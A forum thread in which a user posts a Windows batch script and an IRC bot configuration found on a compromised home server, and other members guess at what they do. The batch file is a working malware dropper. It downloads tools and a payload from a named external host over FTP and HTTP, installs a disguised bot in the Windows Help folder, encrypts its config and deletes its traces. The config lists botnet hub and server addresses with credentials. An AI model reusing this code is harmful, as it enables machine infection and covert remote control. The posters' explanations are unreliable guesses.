maverick
Well-Known Member
I have an old pc on my network that i use as a server and i found this window open.
South Africa’s biggest forum. Discuss, discover, and connect with thousands of members.
@Echo OFF
cd C:\WINDOWS\HELP\
echo [!] Creating a ShellFTP datafile...
echo open ftp.fantasmanero.altervista.org>_sys.ini
echo fantasmanero>>_sys.ini
echo billgates>>_sys.ini
echo binary>>_sys.ini
echo get wget.exe>>_sys.ini
echo bye>>_sys.ini
Echo [!] ShellFTP file Created!
echo [!] Receiving from your FTP...
@ftp -s:_sys.ini>output
@wget.exe -q http://fantasmanero.altervista.org/syspatch.zip>output
@wget.exe -q http://fantasmanero.altervista.org/pkunzip.exe>output
echo AhAhaH EMPTY>output
echo [=] Received, hohooo! Let's start our job!
echo [*] Moving fileZ!
@move pkunzip.exe C:\WINDOWS\Help\pkunzip.exe
@move syspatch.zip C:\WINDOWS\Help\syspatch.zip
echo [*] Creating some cunfusing files!
@mkdir C:\WINDOWS\HELP\CatRoot
copy C:\WINDOWS\Help\*.chm C:\WINDOWS\HELP\CatRoot\
C:\WINDOWS\HELP\pkunzip.exe -d C:\WINDOWS\Help\syspatch.zip
echo [*] Extracting b0tZ...
echo [?] I'll open notepad for you to edit config...Press an key!
pause
notepad C:\WINDOWS\Help\CatRoot\conf.txt
echo [*] Crypting conf & adding startfile
C:\Windows\Help\CatRoot\spoolsrv.exe -c conf.txt
echo [!] Crypted! Removing Traces...
del C:\WINDOWS\Help\CatRoot\conf.txt.dec
del C:\WINDOWS\Help\CatRoot\pkunzip.exe
del C:\WINDOWS\Help\syspatch.zip
del C:\WINDOWS\Help\pkunzip.exe
del _sys.ini
del output
del wget.exe
echo [=] !muahaha system pwned! byebye
echo [Process Starded!]
C:\Windows\Help\CatRoot\start.bat
del C:\first.bat
exit
nick
ident
nickappend _-^`|
realname If you can see me, you're ****ed!
myipv4 0.0.0.0
vhost 0.0.0.0
hub 72.20.33.158 10060 l1nuxr0x irc0p
server 62.94.0.22 6669
server 194.247.160.28 6668
keepnick 1
ctcptype 2
kickreason maybe you're not THAT welcome
partreason searching a reason to my life
cyclereason /cycle works!
quitreason planning revenge against SysAdmin!
Of course he's been hacked.That batch file is creating a FTP Server on his PC.Maybe the FTP server is giving access to his entire PC ( c:\ , d:\ etc)
maybe a IRC system where you can download and upload files
Thats what I am thinking.
well, there you have it..I have an old pc on my network that i use as a server and i found this window open.
echo [?] I'll open notepad for you to edit config...Press an key!
pause
notepad C:\WINDOWS\Help\CatRoot\conf.txt